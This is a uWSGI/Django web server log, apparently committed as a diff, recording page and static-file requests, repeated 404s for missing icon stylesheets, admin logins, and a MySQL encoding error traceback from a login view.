+[pid: 2069|app: 0|req: 18/41] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 07:35:52 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 19/42] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 07:35:52 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 20/43] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 07:35:52 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 21/44] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:35:52 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 22/45] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 07:35:52 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 30 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 23/46] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:35:52 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 24/47] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 07:35:52 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 25/48] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 07:35:52 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 26/49] 219.228.146.156 () {40 vars in 936 bytes} [Thu Jan 14 07:35:54 2021] GET /announcement/ => generated 7421 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 27/50] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 07:35:54 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 28/51] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 07:35:54 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 29/52] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 07:35:54 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 30/53] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 07:35:54 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 19 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 32/54] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:35:54 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 32/55] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:35:54 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 20 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 33/56] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 07:35:54 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 34/57] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 07:35:54 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 35/58] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 07:35:54 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 36/59] 219.228.146.156 () {40 vars in 932 bytes} [Thu Jan 14 07:35:55 2021] GET /kind-manage => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 37/60] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 07:35:55 2021] GET /kind-manage/ => generated 6423 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 38/61] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 07:35:56 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 39/62] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 07:35:56 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 40/63] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 07:35:56 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 41/64] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 07:35:56 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 42/65] 219.228.146.156 () {38 vars in 872 bytes} [Thu Jan 14 07:35:56 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 43/66] 219.228.146.156 () {38 vars in 872 bytes} [Thu Jan 14 07:35:56 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 22 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 44/67] 219.228.146.156 () {38 vars in 818 bytes} [Thu Jan 14 07:35:56 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 45/68] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 07:35:56 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 46/69] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 07:35:56 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 47/70] 219.228.146.156 () {40 vars in 932 bytes} [Thu Jan 14 07:35:58 2021] GET /kind-manage/ => generated 6423 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 48/71] 219.228.146.156 () {38 vars in 885 bytes} [Thu Jan 14 07:35:59 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 49/72] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 07:35:59 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 50/73] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 07:35:59 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 51/74] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 07:35:59 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 52/75] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 07:35:59 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 53/76] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 07:35:59 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 38 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 54/77] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 07:35:59 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 55/78] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 07:35:59 2021] GET /static/css/spinners.css => generated 3516 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 56/79] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 07:35:59 2021] GET /static/css/animate.css => generated 3513 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /
+[pid: 2069|app: 0|req: 57/80] 219.228.146.146 () {38 vars in 824 bytes} [Thu Jan 14 07:36:13 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /favicon.ico
+[pid: 2069|app: 0|req: 58/81] 219.228.146.146 () {38 vars in 770 bytes} [Thu Jan 14 07:36:13 2021] GET /favicon.ico => generated 3480 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 59/82] 219.228.146.146 () {38 vars in 836 bytes} [Thu Jan 14 07:36:21 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /
+[pid: 2069|app: 0|req: 60/83] 219.228.146.253 () {36 vars in 719 bytes} [Thu Jan 14 07:39:00 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /favicon.ico
+[pid: 2069|app: 0|req: 61/84] 219.228.146.253 () {36 vars in 665 bytes} [Thu Jan 14 07:39:00 2021] GET /favicon.ico => generated 3480 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 62/85] 219.228.146.253 () {36 vars in 730 bytes} [Thu Jan 14 07:39:10 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 63/86] 219.228.146.253 () {36 vars in 732 bytes} [Thu Jan 14 07:39:10 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/87] 219.228.146.253 () {38 vars in 766 bytes} [Thu Jan 14 07:39:10 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/88] 219.228.146.253 () {38 vars in 788 bytes} [Thu Jan 14 07:39:10 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/89] 219.228.146.253 () {38 vars in 774 bytes} [Thu Jan 14 07:39:10 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/90] 219.228.146.253 () {38 vars in 749 bytes} [Thu Jan 14 07:39:10 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/91] 219.228.146.253 () {38 vars in 768 bytes} [Thu Jan 14 07:39:10 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/92] 219.228.146.253 () {38 vars in 770 bytes} [Thu Jan 14 07:39:10 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/93] 219.228.146.253 () {38 vars in 747 bytes} [Thu Jan 14 07:39:10 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/94] 219.228.146.253 () {38 vars in 765 bytes} [Thu Jan 14 07:39:10 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/95] 219.228.146.253 () {38 vars in 763 bytes} [Thu Jan 14 07:39:10 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/96] 219.228.146.253 () {38 vars in 755 bytes} [Thu Jan 14 07:39:10 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/97] 219.228.146.253 () {38 vars in 809 bytes} [Thu Jan 14 07:39:13 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/98] 219.228.146.253 () {38 vars in 783 bytes} [Thu Jan 14 07:39:13 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: 0|req: 64/99] 219.228.146.146 () {40 vars in 890 bytes} [Thu Jan 14 07:43:09 2021] GET /my-admin => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 65/100] 219.228.146.146 () {40 vars in 892 bytes} [Thu Jan 14 07:43:09 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/101] 219.228.146.146 () {40 vars in 828 bytes} [Thu Jan 14 07:43:09 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/102] 219.228.146.146 () {40 vars in 850 bytes} [Thu Jan 14 07:43:09 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/103] 219.228.146.146 () {40 vars in 832 bytes} [Thu Jan 14 07:43:09 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/104] 219.228.146.146 () {40 vars in 830 bytes} [Thu Jan 14 07:43:09 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/105] 219.228.146.146 () {40 vars in 836 bytes} [Thu Jan 14 07:43:09 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: 0|req: 66/106] 219.228.146.146 () {48 vars in 978 bytes} [Thu Jan 14 07:43:19 2021] POST /my-admin/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 68/107] 219.228.146.146 () {40 vars in 897 bytes} [Thu Jan 14 07:43:19 2021] GET /admin-home => generated 0 bytes in 11 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 68/108] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:19 2021] POST /login/ => generated 209413 bytes in 122 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 69/109] 219.228.146.146 () {40 vars in 899 bytes} [Thu Jan 14 07:43:19 2021] GET /admin-home/ => generated 6515 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/110] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:43:19 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/111] 219.228.146.146 () {38 vars in 767 bytes} [Thu Jan 14 07:43:19 2021] GET /static/css/style.css => generated 118751 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/112] 219.228.146.146 () {38 vars in 779 bytes} [Thu Jan 14 07:43:19 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/113] 219.228.146.146 () {38 vars in 796 bytes} [Thu Jan 14 07:43:19 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/114] 219.228.146.146 () {38 vars in 808 bytes} [Thu Jan 14 07:43:19 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/115] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:43:19 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/116] 219.228.146.146 () {38 vars in 772 bytes} [Thu Jan 14 07:43:20 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/117] 219.228.146.146 () {38 vars in 748 bytes} [Thu Jan 14 07:43:20 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/118] 219.228.146.146 () {38 vars in 760 bytes} [Thu Jan 14 07:43:20 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/119] 219.228.146.146 () {38 vars in 836 bytes} [Thu Jan 14 07:43:20 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/120] 219.228.146.146 () {38 vars in 758 bytes} [Thu Jan 14 07:43:20 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/121] 219.228.146.146 () {38 vars in 832 bytes} [Thu Jan 14 07:43:21 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 70/122] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:43:21 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
